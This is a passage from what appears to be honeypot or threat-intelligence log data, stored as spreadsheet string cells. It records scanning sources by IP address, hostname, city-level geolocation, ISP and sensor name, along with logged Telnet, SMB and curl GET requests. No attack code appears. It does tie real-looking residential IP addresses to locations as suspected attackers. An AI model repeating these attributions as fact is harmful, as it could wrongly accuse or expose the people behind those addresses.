&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;52059&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:39d3</t>
  </si>
  <si>
    <t>1f8f7a6ae6fdbb090bcb9fec40d11c90</t>
  </si>
  <si>
    <t>59.183.133.98</t>
  </si>
  <si>
    <t>Tarn Taran</t>
  </si>
  <si>
    <t>1254868</t>
  </si>
  <si>
    <t>31.4519</t>
  </si>
  <si>
    <t>74.9278</t>
  </si>
  <si>
    <t>::ffff:3bb7:8562</t>
  </si>
  <si>
    <t>1045100d65147e05f885b755d6d4fa20</t>
  </si>
  <si>
    <t>220.135.138.99</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-135-138-99.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;25966&amp;&amp;23&amp;&amp;46631&amp;&amp;9100&amp;&amp;41695&amp;&amp;60854&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc87:8a63</t>
  </si>
  <si>
    <t>722d8ba53c3f338a91fd45d38d0d9fda</t>
  </si>
  <si>
    <t>59.126.188.50</t>
  </si>
  <si>
    <t>59-126-188-50.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_HTTP_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;21941&amp;&amp;NA&amp;&amp;23</t>
  </si>
  <si>
    <t>GET&amp;&amp;NA&amp;&amp;connection&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:bc32</t>
  </si>
  <si>
    <t>e3fdba7d14c3ed141b463b36b5fe5d08</t>
  </si>
  <si>
    <t>117.235.6.167</t>
  </si>
  <si>
    <t>::ffff:75eb:6a7</t>
  </si>
  <si>
    <t>dfc8231cd09b73acee6896f594d144ed</t>
  </si>
  <si>
    <t>59.91.41.1</t>
  </si>
  <si>
    <t>::ffff:3b5b:2901</t>
  </si>
  <si>
    <t>95fcc1375740bc2b772e716c5efd2cd1</t>
  </si>
  <si>
    <t>98.26.114.134</t>
  </si>
  <si>
    <t>syn-098-026-114-134.res.spectrum.com</t>
  </si>
  <si>
    <t>Raleigh</t>
  </si>
  <si>
    <t>4487042</t>
  </si>
  <si>
    <t>27609</t>
  </si>
  <si>
    <t>35.8409</t>
  </si>
  <si>
    <t>-78.6228</t>
  </si>
  <si>
    <t>TWC-11426-CAROLINAS</t>
  </si>
  <si>
    <t>::ffff:621a:7286</t>
  </si>
  <si>
    <t>d9e1855e6b147b9f8669195cba437336</t>
  </si>
  <si>
    <t>122.117.63.117</t>
  </si>
  <si>
    <t>122-117-63-117.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;2547&amp;&amp;NA&amp;&amp;80&amp;&amp;23&amp;&amp;47160&amp;&amp;51844&amp;&amp;41442&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7a75:3f75</t>
  </si>
  <si>
    <t>1cd9854d032f389fa733ecf4d67d36e1</t>
  </si>
  <si>
    <t>203.217.125.131</t>
  </si>
  <si>
    <t>203-217-125-131.veetime.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H26&amp;&amp;SMA-LAB_MT-CPA_H2&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;47337&amp;&amp;23&amp;&amp;48844&amp;&amp;43990&amp;&amp;9100&amp;&amp;80</t>
  </si>
  <si>
    <t>VEE Time Corp.</t>
  </si>
  <si>
    <t>VEETIME</t>
  </si>
  <si>
    <t>VEETIME-TW</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:cbd9:7d83</t>
  </si>
  <si>
    <t>4a61a6301cf9caa9f3222f9a71ba41ac</t>
  </si>
  <si>
    <t>177.106.226.211</t>
  </si>
  <si>
    <t>Uberlândia</t>
  </si>
  <si>
    <t>3445831</t>
  </si>
  <si>
    <t>-18.9186</t>
  </si>
  <si>
    <t>-48.2772</t>
  </si>
  <si>
    <t>53006</t>
  </si>
  <si>
    <t>AS53006</t>
  </si>
  <si>
    <t>Algar Telecom S/A</t>
  </si>
  <si>
    <t>::ffff:b16a:e2d3</t>
  </si>
  <si>
    <t>a6acda4aa988e1f7676297c3ff2416d6</t>
  </si>
  <si>
    <t>117.251.165.187</t>
  </si>
  <si>
    <t>::ffff:75fb:a5bb</t>
  </si>
  <si>
    <t>c53a889cea2220d3d7abb8f820cafb2d</t>
  </si>
  <si>
    <t>114.33.29.149</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-29-149.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;41533&amp;&amp;41556&amp;&amp;41545&amp;&amp;41579&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:1d95</t>
  </si>
  <si>
    <t>c926c49557d85a5a790e6779b95564a8</t>
  </si>
  <si>
    <t>103.127.31.138</t>
  </si>
  <si>
    <t>Noida (A Block)</t>
  </si>
  <si>
    <t>201301</t>
  </si>
  <si>
    <t>28.6308</t>
  </si>
  <si>
    <t>77.3821</t>
  </si>
  <si>
    <t>134926</t>
  </si>
  <si>
    <t>Micro Hosting Private Limited</t>
  </si>
  <si>
    <t>MicroHost Cloud</t>
  </si>
  <si>
    <t>MicroHost</t>
  </si>
  <si>
    <t>2018-12-11</t>
  </si>
  <si>
    <t>MICROHOST1-IN</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.127.31.138,50195)}&amp;&amp;{Data_SMB:Incoming connection (103.127.31.138,50954)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:677f:1f8a</t>
  </si>
  <si>
    <t>8c0abc40d47ff667d4f02ec60bdf48a0</t>
  </si>
  <si>
    <t>173.49.75.75</t>
  </si>
  <si>
    <t>pool-173-49-75-75.phlapa.fios.verizon.net</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Philadelphia</t>
  </si>
  <si>
    <t>4560349</t>
  </si>
  <si>
    <t>19099</t>
  </si>
  <si>
    <t>39.9526</t>
  </si>
  <si>
    <t>-75.1652</t>
  </si>
  <si>
    <t>2008-10-09</t>
  </si>
  <si>
    <t>VIS-BLOCK</t>
  </si>
  <si>
    <t>{Data_HTTP:{'Connection': 'close', 'Host': '127.0.0.1', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}</t>
  </si>
  <si>
    <t>1999-07-06 22:06:59</t>
  </si>
  <si>
    <t>2025-07-06 22:06:59</t>
  </si>
  <si>
    <t>2024-01-30 15:46:59</t>
  </si>
  <si>
    <t>['NS1.VERIZON.NET', 'NS2.VERIZON.NET', 'NS3.VERIZON.NET', 'NS4.VERIZON.NET']</t>
  </si>
  <si>
    <t>['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited', 'serverTransferProhibited https://icann.org/epp#serverTransferProhibited', 'serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited', 'clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited']</t>
  </si>
  <si>
    <t>['domainabuse@cscglobal.com', 'domainlegalcontact@verizon.com']</t>
  </si>
  <si>
    <t>1300 I Street NW Suite 500 East</t>
  </si>
  <si>
    <t>::ffff:ad31:4b4b</t>
  </si>
  <si>
    <t>86d036226fe55d8a1573592fd5389fc7</t>
  </si>
  <si>
    <t>45.164.177.188</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;23&amp;&amp;NA&amp;&amp;65097</t>
  </si>
  <si>
    <t>query&amp;&amp;connection&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:2da4:b1bc</t>
  </si>
  <si>
    <t>None&amp;&amp;C-U&amp;&amp;C-I</t>
  </si>
  <si>
    <t>8240a417d6532ae9892de65fd3b8c5a4</t>
  </si>
  <si>
    <t>176.35.142.195</t>
  </si>
  <si>
    <t>176-35-142-195.xdsl.murphx.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_SSH_H36&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;65018&amp;&amp;NA</t>
  </si>
  <si>
    <t>East Sussex</t>
  </si>
  <si>
    <t>Hastings</t>
  </si>
  <si>
    <t>2647356</t>
  </si>
  <si>
    <t>50.8557</t>
  </si>
  <si>
    <t>0.58009</t>
  </si>
  <si>
    <t>Daisy</t>
  </si>
  <si>
    <t>2011-05-23</t>
  </si>
  <si>
    <t>::ffff:b023:8ec3</t>
  </si>
  <si>
    <t>49c0d1d023744332184ef90ceaeb8f55</t>
  </si>
  <si>
    <t>59.183.150.159</t>
  </si>
  <si>
    <t>::ffff:3bb7:969f</t>
  </si>
  <si>
    <t>058b4d377a103c13e31ade1e6a9c0ea1</t>
  </si>
  <si>
    <t>117.242.227.115</t>
  </si>
  <si>
    <t>::ffff:75f2:e373</t>
  </si>
  <si>
    <t>f2d80f3c92abce4865fba2373aa1a3ef</t>
  </si>
  <si>
    <t>220.133.146.225</t>
  </si>
  <si>
    <t>220-133-146-225.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18</t>
  </si>
  <si>
    <t>23&amp;&amp;24934&amp;&amp;55342&amp;&amp;20567&amp;&amp;49344&amp;&amp;49472&amp;&amp;49512&amp;&amp;49548&amp;&amp;49591&amp;&amp;49662&amp;&amp;49672&amp;&amp;49566&amp;&amp;49680&amp;&amp;49695&amp;&amp;49704&amp;&amp;80</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc85:92e1</t>
  </si>
  <si>
    <t>6c4d69229fb2d9f02e0d0723ca7d910a</t>
  </si>
  <si>
    <t>220.132.54.11</t>
  </si>
  <si>
    <t>220-132-54-11.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_TELNET_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;63671</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:dc84:360b</t>
  </si>
  <si>
    <t>fa2d549ce40dc7465fb8532eecab27b6</t>
  </si>
  <si>
    <t>1.34.43.114</t>
  </si>
  <si>
    <t>1-34-43-114.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;80&amp;&amp;40816&amp;&amp;23&amp;&amp;20266&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:122:2b72</t>
  </si>
  <si>
    <t>8404ef902b3869165385568a0aae75a8</t>
  </si>
  <si>
    <t>59.126.168.111</t>
  </si>
  <si>
    <t>59-126-168-111.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
